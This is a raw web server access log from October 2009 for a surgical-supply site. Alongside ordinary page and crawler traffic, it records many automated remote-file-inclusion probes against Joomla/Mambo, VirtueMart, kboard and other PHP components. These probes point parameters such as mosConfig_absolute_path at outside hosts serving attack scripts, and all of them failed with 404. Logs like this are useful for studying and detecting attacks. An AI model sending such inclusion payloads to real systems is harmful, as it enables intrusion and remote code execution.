65.172.143.253 - - [18/Oct/2009:05:00:18 -0400] "GET /logs/access_log.Q109080200//?mosConfig_absolute_path=http://www.eggsactrace.com/mambo/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
65.172.143.253 - - [18/Oct/2009:05:00:25 -0400] "GET /logs/access_log.Q109062000//?mosConfig_absolute_path=http://www.eggsactrace.com/mambo/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
72.30.78.230 - - [18/Oct/2009:05:00:39 -0400] "GET /logs/error_log.Q109101100 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
210.110.97.12 - - [18/Oct/2009:05:01:15 -0400] "GET /logs/access_log.Q109092700%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
72.30.78.230 - - [18/Oct/2009:05:01:25 -0400] "GET /logs/error_log.Q109092700 HTTP/1.0" 200 3048218 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
210.110.97.12 - - [18/Oct/2009:05:01:26 -0400] "GET /logs/access_log.Q109092700%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
210.110.97.12 - - [18/Oct/2009:05:01:37 -0400] "GET /logs/access_log.Q109081200%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
128.252.27.10 - - [18/Oct/2009:05:01:43 -0400] "GET /logs/access_log.Q109080200%20//?mosConfig_absolute_path=http://www.eggsactrace.com/mambo/id.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
210.110.97.12 - - [18/Oct/2009:05:01:48 -0400] "GET /logs/access_log.Q109081200%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
72.30.78.230 - - [18/Oct/2009:05:01:25 -0400] "GET /logs/error_log.Q109092700 HTTP/1.0" 200 3048218 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
69.73.181.125 - - [18/Oct/2009:05:02:23 -0400] "GET /logs/access_log.Q109081400//spaw_control.class.php?spaw_root=lover? HTTP/1.1" 404 248 "-" "libwww-perl/5.831"
69.73.181.125 - - [18/Oct/2009:05:02:23 -0400] "GET //spaw_control.class.php?spaw_root=lover? HTTP/1.1" 404 221 "-" "libwww-perl/5.831"
69.73.181.125 - - [18/Oct/2009:05:02:23 -0400] "GET /logs//spaw_control.class.php?spaw_root=lover? HTTP/1.1" 404 226 "-" "libwww-perl/5.831"
222.118.124.130 - - [18/Oct/2009:05:03:20 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
222.118.124.130 - - [18/Oct/2009:05:03:20 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
222.118.124.130 - - [18/Oct/2009:05:03:22 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
222.118.124.130 - - [18/Oct/2009:05:03:22 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
72.30.78.230 - - [18/Oct/2009:05:03:26 -0400] "GET /logs/error_log.Q109091700 HTTP/1.0" 200 3127453 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
69.73.181.125 - - [18/Oct/2009:05:03:35 -0400] "GET /logs/access_log.Q109072500//spaw_control.class.php?spaw_root=lover? HTTP/1.1" 404 248 "-" "libwww-perl/5.831"
69.73.181.125 - - [18/Oct/2009:05:03:46 -0400] "GET /logs/access_log.Q109081400//spaw_control.class.php?spaw_root=http://www.bernardyni.ofm.pl/bernardyni/cgi-bin/motu.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.831"
69.73.181.125 - - [18/Oct/2009:05:03:46 -0400] "GET //spaw_control.class.php?spaw_root=http://www.bernardyni.ofm.pl/bernardyni/cgi-bin/motu.txt? HTTP/1.1" 404 221 "-" "libwww-perl/5.831"
69.73.181.125 - - [18/Oct/2009:05:03:46 -0400] "GET /logs//spaw_control.class.php?spaw_root=http://www.bernardyni.ofm.pl/bernardyni/cgi-bin/motu.txt? HTTP/1.1" 404 226 "-" "libwww-perl/5.831"
72.30.78.230 - - [18/Oct/2009:05:03:48 -0400] "GET /logs/access_log.Q109101400 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
147.46.116.207 - - [18/Oct/2009:05:03:51 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
147.46.116.207 - - [18/Oct/2009:05:03:51 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
147.46.116.207 - - [18/Oct/2009:05:03:51 -0400] "GET /logs/access_log.Q109070700%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
220.125.237.35 - - [18/Oct/2009:05:03:59 -0400] "GET /logs/access_log.Q109091700%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
220.125.237.35 - - [18/Oct/2009:05:03:59 -0400] "GET /logs/access_log.Q109051300%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
220.125.237.35 - - [18/Oct/2009:05:03:59 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
220.125.237.35 - - [18/Oct/2009:05:03:59 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
72.30.78.230 - - [18/Oct/2009:05:03:26 -0400] "GET /logs/error_log.Q109091700 HTTP/1.0" 200 3127453 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.29.70.51 - - [18/Oct/2009:05:04:11 -0400] "GET //login.php?dir=http://www.fresnodelapolvorosa.com/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.29.70.51 - - [18/Oct/2009:05:04:11 -0400] "GET /logs//login.php?dir=http://www.fresnodelapolvorosa.com/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.29.70.51 - - [18/Oct/2009:05:04:12 -0400] "GET /logs/access_log.Q109061300//login.php?dir=http://www.fresnodelapolvorosa.com/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.48.121.149 - - [18/Oct/2009:05:04:31 -0400] "GET /logs/access_log.Q109051500//bbs/jiyoo_skyblue/setup.php?dir=http://www.1004bang.net/1004bangmall/dataroom/review/idxx.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
211.48.121.149 - - [18/Oct/2009:05:04:31 -0400] "GET /logs//bbs/jiyoo_skyblue/setup.php?dir=http://www.1004bang.net/1004bangmall/dataroom/review/idxx.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
211.48.121.149 - - [18/Oct/2009:05:04:31 -0400] "GET //bbs/jiyoo_skyblue/setup.php?dir=http://www.1004bang.net/1004bangmall/dataroom/review/idxx.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
72.29.70.51 - - [18/Oct/2009:05:04:42 -0400] "GET /logs/access_log.Q109061300%20%20//login.php?dir=http://www.fresnodelapolvorosa.com/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.48.121.149 - - [18/Oct/2009:05:04:54 -0400] "GET /logs/access_log.Q109093000//modules/agendax/addevent.inc.php?agendax_path=http://www.1004bang.net/1004bangmall/dataroom/review/idxx.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
211.48.121.149 - - [18/Oct/2009:05:04:55 -0400] "GET /logs/access_log.Q109061800//modules/agendax/addevent.inc.php?agendax_path=http://www.1004bang.net/1004bangmall/dataroom/review/idxx.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
211.48.121.149 - - [18/Oct/2009:05:04:55 -0400] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.1004bang.net/1004bangmall/dataroom/review/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.48.121.149 - - [18/Oct/2009:05:04:56 -0400] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.1004bang.net/1004bangmall/dataroom/review/idxx.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
69.73.181.125 - - [18/Oct/2009:05:05:11 -0400] "GET /logs/access_log.Q109072500//spaw_control.class.php?spaw_root=http://www.bernardyni.ofm.pl/bernardyni/cgi-bin/motu.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.831"
211.48.121.149 - - [18/Oct/2009:05:05:23 -0400] "GET /logs/access_log.Q109051500//bbs/jiyoo_skyblue/setup.php?dir=http://www.1004bang.net/1004bangmall/dataroom/review/idxx.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
211.48.121.149 - - [18/Oct/2009:05:05:23 -0400] "GET /logs//bbs/jiyoo_skyblue/setup.php?dir=http://www.1004bang.net/1004bangmall/dataroom/review/idxx.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
211.48.121.149 - - [18/Oct/2009:05:05:23 -0400] "GET //bbs/jiyoo_skyblue/setup.php?dir=http://www.1004bang.net/1004bangmall/dataroom/review/idxx.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
211.48.121.149 - - [18/Oct/2009:05:05:25 -0400] "GET /logs/access_log.Q109072200//bbs/jiyoo_skyblue/setup.php?dir=http://www.1004bang.net/1004bangmall/dataroom/review/idxx.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
94.75.245.36 - - [18/Oct/2009:05:05:40 -0400] "GET //galeria.php?start=0&kategoria=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
77.222.131.59 - - [18/Oct/2009:05:05:40 -0400] "GET /logs/access_log.Q109091900//galeria.php?start=0&kategoria=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
77.222.131.59 - - [18/Oct/2009:05:05:40 -0400] "GET /logs//galeria.php?start=0&kategoria=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
77.222.131.59 - - [18/Oct/2009:05:05:40 -0400] "GET //galeria.php?start=0&kategoria=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
94.75.245.36 - - [18/Oct/2009:05:05:40 -0400] "GET /logs//galeria.php?start=0&kategoria=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
94.75.245.36 - - [18/Oct/2009:05:05:40 -0400] "GET /logs/access_log.Q109091900//galeria.php?start=0&kategoria=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
77.222.131.59 - - [18/Oct/2009:05:05:49 -0400] "GET /logs//galeria.php?start=0&kategoria=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
77.222.131.59 - - [18/Oct/2009:05:05:49 -0400] "GET //galeria.php?start=0&kategoria=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
77.222.131.59 - - [18/Oct/2009:05:05:50 -0400] "GET /logs/access_log.Q109091900%20%20//galeria.php?start=0&kategoria=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
94.75.245.36 - - [18/Oct/2009:05:05:50 -0400] "GET //galeria.php?start=0&kategoria=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
94.75.245.36 - - [18/Oct/2009:05:05:50 -0400] "GET /logs//galeria.php?start=0&kategoria=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
94.75.245.36 - - [18/Oct/2009:05:05:50 -0400] "GET /logs/access_log.Q109091900%20%20//galeria.php?start=0&kategoria=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Oct/2009:05:06:45 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.30.78.230 - - [18/Oct/2009:05:07:04 -0400] "GET /logs/access_log.Q109101200 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.78.230 - - [18/Oct/2009:05:07:13 -0400] "GET /logs/error_log.Q109060500 HTTP/1.0" 200 2740178 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
77.222.131.59 - - [18/Oct/2009:05:07:37 -0400] "GET /logs/access_log.Q109091900//galeria.php?start=0&kategoria=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
77.222.131.59 - - [18/Oct/2009:05:07:37 -0400] "GET /logs//galeria.php?start=0&kategoria=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
77.222.131.59 - - [18/Oct/2009:05:07:37 -0400] "GET //galeria.php?start=0&kategoria=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
94.75.245.36 - - [18/Oct/2009:05:07:38 -0400] "GET //galeria.php?start=0&kategoria=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
94.75.245.36 - - [18/Oct/2009:05:07:38 -0400] "GET /logs/access_log.Q109091900//galeria.php?start=0&kategoria=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
94.75.245.36 - - [18/Oct/2009:05:07:38 -0400] "GET /logs//galeria.php?start=0&kategoria=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
76.28.189.86 - - [18/Oct/2009:05:07:43 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.28.189.86 - - [18/Oct/2009:05:07:43 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.28.189.86 - - [18/Oct/2009:05:07:44 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.28.189.86 - - [18/Oct/2009:05:07:44 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
72.30.78.230 - - [18/Oct/2009:05:07:17 -0400] "GET /logs/error_log.Q109060500 HTTP/1.0" 200 2740178 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.236.47.182 - - [18/Oct/2009:05:08:18 -0400] "GET /logs/access_log.Q109100400//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
77.222.131.59 - - [18/Oct/2009:05:10:24 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
77.222.131.59 - - [18/Oct/2009:05:10:24 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
77.222.131.59 - - [18/Oct/2009:05:10:24 -0400] "GET /logs/access_log.Q109082400//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
94.75.245.36 - - [18/Oct/2009:05:10:25 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
94.75.245.36 - - [18/Oct/2009:05:10:25 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
94.75.245.36 - - [18/Oct/2009:05:10:25 -0400] "GET /logs/access_log.Q109082400//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
77.222.131.59 - - [18/Oct/2009:05:10:37 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
77.222.131.59 - - [18/Oct/2009:05:10:37 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
77.222.131.59 - - [18/Oct/2009:05:10:37 -0400] "GET /logs/access_log.Q109082400%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
94.75.245.36 - - [18/Oct/2009:05:10:37 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
94.75.245.36 - - [18/Oct/2009:05:10:37 -0400] "GET /logs/access_log.Q109082400%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
94.75.245.36 - - [18/Oct/2009:05:10:37 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.hostmann-steinberg.ru/x? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
76.28.189.86 - - [18/Oct/2009:05:10:41 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76790 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.28.189.86 - - [18/Oct/2009:05:10:42 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.28.189.86 - - [18/Oct/2009:05:10:42 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.28.189.86 - - [18/Oct/2009:05:10:42 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.28.189.86 - - [18/Oct/2009:05:10:42 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.28.189.86 - - [18/Oct/2009:05:10:42 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.28.189.86 - - [18/Oct/2009:05:10:43 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.28.189.86 - - [18/Oct/2009:05:10:43 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.28.189.86 - - [18/Oct/2009:05:10:43 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.28.189.86 - - [18/Oct/2009:05:10:43 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.28.189.86 - - [18/Oct/2009:05:10:43 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.28.189.86 - - [18/Oct/2009:05:10:43 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.28.189.86 - - [18/Oct/2009:05:10:43 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.28.189.86 - - [18/Oct/2009:05:10:43 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.28.189.86 - - [18/Oct/2009:05:10:43 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.28.189.86 - - [18/Oct/2009:05:10:43 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.28.189.86 - - [18/Oct/2009:05:10:43 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.28.189.86 - - [18/Oct/2009:05:10:43 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.28.189.86 - - [18/Oct/2009:05:10:44 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
76.28.189.86 - - [18/Oct/2009:05:10:44 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
